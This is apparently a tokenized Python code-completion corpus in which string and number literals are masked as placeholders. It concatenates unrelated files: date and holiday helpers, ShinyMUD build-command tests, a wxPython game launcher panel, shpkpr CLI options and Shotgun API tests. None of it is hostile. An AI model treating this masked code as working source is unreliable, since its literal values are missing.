timedelta ( ** { unit : _val } ) <EOL> return _base <EOL> def after ( base = _datetime , diff = None ) : <EOL> """<STR_LIT>""" <EOL> _base = parse ( base ) <EOL> if isinstance ( _base , datetime . date ) : <EOL> _base = midnight ( _base ) <EOL> result_dict = dp ( diff ) <EOL> for unit in result_dict : <EOL> _val = result_dict [ unit ] <EOL> if not _val : <EOL> continue <EOL> if unit == '<STR_LIT>' : <EOL> _base = _base . replace ( year = ( _base . year + _val ) ) <EOL> elif unit == '<STR_LIT>' : <EOL> if _base . month + _val <= <NUM_LIT:12> : <EOL> _base = _base . replace ( month = _base . month + _val ) <EOL> else : <EOL> _month_diff = ( _base . month + _val ) - <NUM_LIT:12> <EOL> _base = _base . replace ( year = _base . year + <NUM_LIT:1> ) . replace ( month = _month_diff ) <EOL> elif unit in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> _base = _base + datetime . timedelta ( ** { unit : _val } ) <EOL> return _base <EOL> def _datetime_to_date ( arg ) : <EOL> """<STR_LIT>""" <EOL> _arg = parse ( arg ) <EOL> if isinstance ( _arg , datetime . datetime ) : <EOL> _arg = _arg . date ( ) <EOL> return _arg <EOL> def this_week ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> return _arg - datetime . timedelta ( days = _arg . weekday ( ) ) , _arg + datetime . timedelta ( <EOL> days = <NUM_LIT:6> - _arg . weekday ( ) ) if clean else _arg + datetime . timedelta ( days = <NUM_LIT:6> - _arg . 
weekday ( ) ) + _ONE_DAY <EOL> def last_week ( arg = _date , clean = False ) : <EOL> this_week_tuple = this_week ( arg ) <EOL> return this_week_tuple [ <NUM_LIT:0> ] - _SEVEN_DAYS , this_week_tuple [ <NUM_LIT:1> ] - _SEVEN_DAYS if clean else this_week_tuple [ <NUM_LIT:1> ] - _SEVEN_DAYS + _ONE_DAY <EOL> def next_week ( arg = _date , clean = False ) : <EOL> this_week_tuple = this_week ( arg ) <EOL> return this_week_tuple [ <NUM_LIT:0> ] + _SEVEN_DAYS , this_week_tuple [ <NUM_LIT:1> ] + _SEVEN_DAYS if clean else this_week_tuple [ <NUM_LIT:1> ] + _SEVEN_DAYS + _ONE_DAY <EOL> def this_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> return datetime . date ( _arg . year , _arg . month , <NUM_LIT:1> ) , lastday ( _arg . year , _arg . month ) if clean else lastday ( _arg . year , _arg . month ) + _ONE_DAY <EOL> def last_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> this_month_first_day = datetime . date ( _arg . year , _arg . month , <NUM_LIT:1> ) <EOL> last_month_last_day = this_month_first_day - _ONE_DAY <EOL> last_month_first_day = datetime . date ( last_month_last_day . year , last_month_last_day . month , <NUM_LIT:1> ) <EOL> return last_month_first_day , last_month_last_day if clean else this_month_first_day <EOL> def next_month ( arg = _date , clean = False ) : <EOL> _arg = _datetime_to_date ( arg ) <EOL> this_month_last_day = lastday ( _arg . year , _arg . month ) <EOL> next_month_first_day = this_month_last_day + _ONE_DAY <EOL> next_month_last_day = lastday ( next_month_first_day . year , next_month_first_day . month ) <EOL> return next_month_first_day , next_month_last_day if clean else next_month_last_day + _ONE_DAY <EOL> def newyear ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:1> , <NUM_LIT:1> ) if year else datetime . date ( _year , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> def valentine ( year = None ) : <EOL> return datetime . 
date ( int ( year ) , <NUM_LIT:2> , <NUM_LIT> ) if year else datetime . date ( _year , <NUM_LIT:2> , <NUM_LIT> ) <EOL> def fool ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:4> , <NUM_LIT:1> ) if year else datetime . date ( _year , <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> def christmas ( year = None ) : <EOL> return datetime . date ( int ( year ) , <NUM_LIT:12> , <NUM_LIT> ) if year else datetime . date ( _year , <NUM_LIT:12> , <NUM_LIT> ) <EOL> def christeve ( year = None ) : <EOL> return yesterday ( christmas ( year ) ) <EOL> def mother ( year = None ) : <EOL> """<STR_LIT>""" <EOL> may_first = datetime . date ( _year , <NUM_LIT:5> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:5> , <NUM_LIT:1> ) <EOL> weekday_seq = may_first . weekday ( ) <EOL> return datetime . date ( may_first . year , <NUM_LIT:5> , ( <NUM_LIT> - weekday_seq ) ) <EOL> def father ( year = None ) : <EOL> """<STR_LIT>""" <EOL> june_first = datetime . date ( _year , <NUM_LIT:6> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:6> , <NUM_LIT:1> ) <EOL> weekday_seq = june_first . weekday ( ) <EOL> return datetime . date ( june_first . year , <NUM_LIT:6> , ( <NUM_LIT> - weekday_seq ) ) <EOL> def halloween ( year = None ) : <EOL> return lastday ( month = <NUM_LIT:10> ) if not year else lastday ( year , <NUM_LIT:10> ) <EOL> def easter ( year = None ) : <EOL> """<STR_LIT>""" <EOL> y = int ( year ) if year else _year <EOL> n = y - <NUM_LIT> <EOL> a = n % <NUM_LIT> <EOL> q = n // <NUM_LIT:4> <EOL> b = ( <NUM_LIT:7> * a + <NUM_LIT:1> ) // <NUM_LIT> <EOL> m = ( <NUM_LIT:11> * a + <NUM_LIT:4> - b ) % <NUM_LIT> <EOL> w = ( n + q + <NUM_LIT> - m ) % <NUM_LIT:7> <EOL> d = <NUM_LIT> - m - w <EOL> if d > <NUM_LIT:0> : <EOL> return datetime . date ( y , <NUM_LIT:4> , d ) <EOL> else : <EOL> return datetime . date ( y , <NUM_LIT:3> , ( <NUM_LIT> - d ) ) <EOL> def thanks ( year = None ) : <EOL> """<STR_LIT>""" <EOL> nov_first = datetime . 
date ( _year , <NUM_LIT:11> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:11> , <NUM_LIT:1> ) <EOL> weekday_seq = nov_first . weekday ( ) <EOL> if weekday_seq > <NUM_LIT:3> : <EOL> current_day = <NUM_LIT:32> - weekday_seq <EOL> else : <EOL> current_day = <NUM_LIT> - weekday_seq <EOL> return datetime . date ( nov_first . year , <NUM_LIT:11> , current_day ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( bp ( '<STR_LIT>' ) ) </s>
<s> from shinymud . lib . sport_plugins import SportError <EOL> import os <EOL> def transport ( world , shinydata , filename , path ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( path ) : <EOL> try : <EOL> os . mkdir ( path ) <EOL> except Exception , e : <EOL> world . log . error ( '<STR_LIT>' + str ( e ) ) <EOL> raise SportError ( '<STR_LIT>' ) <EOL> filepath = os . path . join ( path , filename ) <EOL> try : <EOL> f = open ( filepath , '<STR_LIT:w>' ) <EOL> except IOError , e : <EOL> world . log . debug ( str ( e ) ) <EOL> raise SportError ( '<STR_LIT>' ) <EOL> else : <EOL> f . write ( shinydata ) <EOL> finally : <EOL> f . close ( ) <EOL> return '<STR_LIT>' % filepath </s>
<s> from shinytest import ShinyTestCase <EOL> import os <EOL> class TestBuildCommands ( ShinyTestCase ) : <EOL> def setUp ( self ) : <EOL> ShinyTestCase . setUp ( self ) <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import build_list <EOL> from shinymud . modes . build_mode import BuildMode <EOL> self . bob = Player ( ( '<STR_LIT>' , '<STR_LIT:bar>' ) ) <EOL> self . bob . mode = None <EOL> self . bob . playerize ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> self . world . player_add ( self . bob ) <EOL> self . bob . mode = BuildMode ( self . bob ) <EOL> self . bob . permissions = self . bob . permissions | config . BUILDER <EOL> def _clean_test_file ( self , path ) : <EOL> try : <EOL> os . remove ( path ) <EOL> except Exception , e : <EOL> self . world . log . debug ( '<STR_LIT>' + str ( e ) ) <EOL> def test_edit_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> empty = '<STR_LIT>' <EOL> self . assertTrue ( empty in self . bob . outq ) <EOL> fail = '<STR_LIT>' <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( fail in self . bob . outq ) <EOL> success = '<STR_LIT>' <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertEqual ( self . bob . mode . edit_area , area ) <EOL> self . assertTrue ( success in self . bob . outq ) <EOL> def test_link_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . 
player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit , Link <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> room1 = area . new_room ( ) <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> Edit ( self . bob , '<STR_LIT>' % room1 . id , '<STR_LIT>' ) . run ( ) <EOL> Link ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> north = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( north ) <EOL> self . assertEqual ( north . linked_exit , '<STR_LIT>' ) <EOL> self . bob . outq = [ ] <EOL> room2 = area . new_room ( ) <EOL> Link ( self . bob , '<STR_LIT>' % room2 . id , '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> east = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . bob . world . log . debug ( east ) <EOL> self . assertTrue ( east ) <EOL> self . assertEqual ( east . linked_exit , '<STR_LIT>' ) <EOL> self . assertEqual ( east . to_room , room2 ) <EOL> area2 = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> cake_room = area2 . new_room ( ) <EOL> Link ( self . bob , <EOL> '<STR_LIT>' % ( cake_room . id , <EOL> cake_room . area . name ) , <EOL> '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> west = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( west ) <EOL> self . assertEqual ( west . linked_exit , '<STR_LIT>' ) <EOL> self . assertEqual ( west . to_room , cake_room ) <EOL> self . bob . outq = [ ] <EOL> Link ( self . bob , <EOL> '<STR_LIT>' % ( cake_room . id , <EOL> cake_room . area . name ) , <EOL> '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> fail = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( fail in self . bob . 
outq ) <EOL> def test_unlink_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit , Link , Unlink <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> room1 = area . new_room ( ) <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> Edit ( self . bob , '<STR_LIT>' % room1 . id , '<STR_LIT>' ) . run ( ) <EOL> Link ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> room2 = room1 . exits . get ( '<STR_LIT>' ) . to_room <EOL> self . assertTrue ( room2 . exits [ '<STR_LIT>' ] . linked_exit ) <EOL> self . assertTrue ( room1 . exits [ '<STR_LIT>' ] . linked_exit ) <EOL> Unlink ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertEqual ( room1 . exits . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( room2 . exits . get ( '<STR_LIT>' ) , None ) <EOL> def test_export_command ( self ) : <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Export <EOL> from shinymud . data . config import AREAS_EXPORT_DIR <EOL> a = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( '<STR_LIT>' in self . bob . outq ) <EOL> error = '<STR_LIT>' <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> error = '<STR_LIT>' <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> self . assertTrue ( self . world . area_exists ( '<STR_LIT>' ) ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . 
log . debug ( self . bob . outq ) <EOL> self . assertTrue ( self . bob . outq [ - <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( os . path . exists ( AREAS_EXPORT_DIR + '<STR_LIT>' ) ) <EOL> self . _clean_test_file ( AREAS_EXPORT_DIR + '<STR_LIT>' ) <EOL> def test_import_command ( self ) : <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Import , Export <EOL> from shinymud . data . config import AREAS_EXPORT_DIR , AREAS_IMPORT_DIR <EOL> Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' } ) <EOL> Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( os . path . exists ( AREAS_EXPORT_DIR + '<STR_LIT>' ) ) <EOL> self . world . destroy_area ( '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . assertFalse ( self . world . area_exists ( '<STR_LIT>' ) ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( '<STR_LIT>' in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> b = self . world . get_area ( '<STR_LIT>' ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( b ) <EOL> self . assertEqual ( b . description , '<STR_LIT>' ) <EOL> self . world . destroy_area ( '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> self . 
_clean_test_file ( AREAS_EXPORT_DIR + '<STR_LIT>' ) </s>
<s> import wx <EOL> import wx . grid <EOL> from eve_mlp . common import LaunchConfig <EOL> import wx . lib . agw . ultimatelistctrl as ulc <EOL> class LauncherPanel ( wx . Panel ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , config ) : <EOL> wx . Panel . __init__ ( self , parent ) <EOL> self . parent = parent <EOL> self . config = config <EOL> self . main = parent <EOL> self . selected_id = <NUM_LIT:0> <EOL> box = wx . BoxSizer ( wx . VERTICAL ) <EOL> box . SetMinSize ( ( <NUM_LIT> , <NUM_LIT:200> ) ) <EOL> self . lc_grid = wx . FlexGridSizer ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> self . lc_grid . AddGrowableCol ( <NUM_LIT:1> ) <EOL> launch_sel = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> add_setup = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> del_setup = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnLaunchSel , launch_sel ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnAddSetup , add_setup ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnDelSetup , del_setup ) <EOL> box . Add ( self . lc_grid , <NUM_LIT:1> , wx . EXPAND ) <EOL> box . Add ( launch_sel , <NUM_LIT:0> , wx . EXPAND ) <EOL> box . Add ( add_setup , <NUM_LIT:0> , wx . EXPAND ) <EOL> box . Add ( del_setup , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . SetSizer ( box ) <EOL> self . Layout ( ) <EOL> self . update ( ) <EOL> def update ( self ) : <EOL> self . lc_grid . Clear ( True ) <EOL> for n , lc in enumerate ( self . config . launches ) : <EOL> check = wx . CheckBox ( self , <NUM_LIT> + n ) <EOL> check . SetValue ( lc . selected ) <EOL> self . Bind ( wx . EVT_CHECKBOX , self . OnCheck , check ) <EOL> self . lc_grid . Add ( check , <NUM_LIT:0> , wx . ALIGN_CENTER_VERTICAL ) <EOL> name = wx . Button ( self , <NUM_LIT> + n , lc . confname , style = wx . NO_BORDER | wx . BU_LEFT ) <EOL> if n == self . selected_id : <EOL> f = name . GetFont ( ) <EOL> name . SetFont ( wx . Font ( f . GetPointSize ( ) , f . 
GetFamily ( ) , f . GetStyle ( ) , wx . BOLD ) ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnItemSelected , name ) <EOL> self . lc_grid . Add ( name , <NUM_LIT:1> , wx . EXPAND | wx . ALIGN_CENTER_VERTICAL ) <EOL> button = wx . Button ( self , <NUM_LIT> + n , label = "<STR_LIT>" ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnLaunch , button ) <EOL> self . lc_grid . Add ( button ) <EOL> self . Layout ( ) <EOL> def OnCheck ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . config . launches [ uid ] . selected = evt . IsChecked ( ) <EOL> def OnItemSelected ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . main . OnLaunchConfigSelected ( uid ) <EOL> self . selected_id = uid <EOL> self . update ( ) <EOL> def OnLaunch ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . main . launch ( self . config . launches [ uid ] ) <EOL> def OnLaunchAll ( self , evt ) : <EOL> for launch_config in self . config . launches : <EOL> self . main . launch ( launch_config ) <EOL> def OnLaunchSel ( self , evt ) : <EOL> for launch_config in self . config . launches : <EOL> if launch_config . selected : <EOL> self . main . launch ( launch_config ) <EOL> def OnAddSetup ( self , evt ) : <EOL> self . config . launches . append ( LaunchConfig ( self . config . defaults , { "<STR_LIT>" : "<STR_LIT>" } ) ) <EOL> self . main . OnLaunchConfigSelected ( len ( self . config . launches ) - <NUM_LIT:1> ) <EOL> self . update ( ) <EOL> def OnDelSetup ( self , evt ) : <EOL> del self . config . launches [ self . selected_id ] <EOL> if len ( self . config . launches ) == <NUM_LIT:0> : <EOL> self . config . launches . append ( LaunchConfig ( self . config . defaults , { "<STR_LIT>" : "<STR_LIT>" } ) ) <EOL> self . selected_id = <NUM_LIT:0> <EOL> self . main . OnLaunchConfigSelected ( <NUM_LIT:0> ) <EOL> self . update ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import chronos <EOL> import click <EOL> from shpkpr . cli . entrypoint import CONTEXT_SETTINGS <EOL> from shpkpr . marathon import MarathonClient <EOL> from shpkpr . mesos import MesosClient <EOL> application_id = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> completed = click . option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> cpus = click . option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> type = float , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> dry_run = click . option ( <EOL> '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> env_prefix = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> default = CONTEXT_SETTINGS [ '<STR_LIT>' ] , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> follow = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> force = click . option ( <EOL> '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> instances = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> lines = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , <EOL> ) <EOL> marathon_client = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> callback = lambda c , p , v : MarathonClient ( v ) <EOL> ) <EOL> mem = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> mesos_client = click . 
option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> callback = lambda c , p , v : MesosClient ( v ) <EOL> ) <EOL> stream = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> help = '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> template_path = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> type = str , <EOL> default = os . getcwd ( ) , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> template_names = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> type = str , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> multiple = True , <EOL> ) <EOL> chronos_client = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = '<STR_LIT>' , <EOL> callback = lambda c , p , v : chronos . connect ( [ v ] ) , <EOL> ) <EOL> job_name = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = str , <EOL> help = '<STR_LIT>' , <EOL> ) </s>
<s> import functools <EOL> import os <EOL> import pytest <EOL> from click . testing import CliRunner <EOL> from shpkpr . cli . entrypoint import cli <EOL> @ pytest . fixture ( scope = "<STR_LIT>" ) <EOL> def env ( ) : <EOL> env = { <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> } <EOL> assert None not in env . values ( ) <EOL> return env <EOL> @ pytest . fixture <EOL> def runner ( ) : <EOL> runner = CliRunner ( ) <EOL> return functools . partial ( runner . invoke , cli ) </s>
<s> """<STR_LIT>""" <EOL> import base <EOL> import random <EOL> import shotgun_api3 <EOL> class TestShotgunApiLong ( base . LiveTestBase ) : <EOL> def test_automated_find ( self ) : <EOL> """<STR_LIT>""" <EOL> all_entities = self . sg . schema_entity_read ( ) . keys ( ) <EOL> direction = "<STR_LIT>" <EOL> filter_operator = "<STR_LIT:all>" <EOL> limit = <NUM_LIT:1> <EOL> page = <NUM_LIT:1> <EOL> for entity_type in all_entities : <EOL> if entity_type in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> continue <EOL> print "<STR_LIT>" , entity_type <EOL> fields = self . sg . schema_field_read ( entity_type ) <EOL> if not fields : <EOL> print "<STR_LIT>" % ( entity_type , ) <EOL> continue <EOL> order_field = None <EOL> for field_name , field in fields . iteritems ( ) : <EOL> if field [ '<STR_LIT>' ] [ "<STR_LIT:value>" ] != '<STR_LIT>' : <EOL> order_field = field_name <EOL> break <EOL> order = [ { '<STR_LIT>' : order_field , '<STR_LIT>' : direction } ] <EOL> if "<STR_LIT>" in fields : <EOL> filters = [ [ '<STR_LIT>' , '<STR_LIT>' , self . project ] ] <EOL> else : <EOL> filters = [ ] <EOL> records = self . sg . find ( entity_type , filters , fields = fields . keys ( ) , <EOL> order = order , filter_operator = filter_operator , <EOL> limit = limit , page = page ) <EOL> self . assertTrue ( isinstance ( records , list ) ) <EOL> if filter_operator == "<STR_LIT:all>" : <EOL> filter_operator = "<STR_LIT>" <EOL> else : <EOL> filter_operator = "<STR_LIT:all>" <EOL> if direction == "<STR_LIT>" : <EOL> direction = "<STR_LIT>" <EOL> else : <EOL> direction = "<STR_LIT>" <EOL> limit = ( limit % <NUM_LIT:5> ) + <NUM_LIT:1> <EOL> page = ( page % <NUM_LIT:3> ) + <NUM_LIT:1> <EOL> def test_schema ( self ) : <EOL> """<STR_LIT>""" <EOL> schema = self . sg . schema_entity_read ( ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_read ( ) <EOL> self . 
assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_field_read ( "<STR_LIT>" ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_field_read ( "<STR_LIT>" , field_name = "<STR_LIT:user>" ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( "<STR_LIT:user>" in schema ) <EOL> human_field_name = "<STR_LIT>" + str ( random . getrandbits ( <NUM_LIT> ) ) <EOL> properties = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> new_field_name = self . sg . schema_field_create ( "<STR_LIT>" , "<STR_LIT>" , human_field_name , <EOL> properties = properties ) <EOL> properties = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> ret_val = self . sg . schema_field_update ( "<STR_LIT>" , <EOL> new_field_name , <EOL> properties ) <EOL> self . assertTrue ( ret_val ) <EOL> ret_val = self . sg . schema_field_delete ( "<STR_LIT>" , new_field_name ) <EOL> self . assertTrue ( ret_val ) <EOL> def test_schema_with_project ( self ) : <EOL> """<STR_LIT>""" <EOL> project_entity = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : <NUM_LIT:0> } <EOL> if not self . sg . server_caps . version or self . sg . server_caps . version < ( <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_entity_read , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_read , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_field_read , '<STR_LIT>' , None , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_field_read , '<STR_LIT>' , '<STR_LIT:user>' , project_entity ) <EOL> else : <EOL> schema = self . sg . schema_entity_read ( project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . 
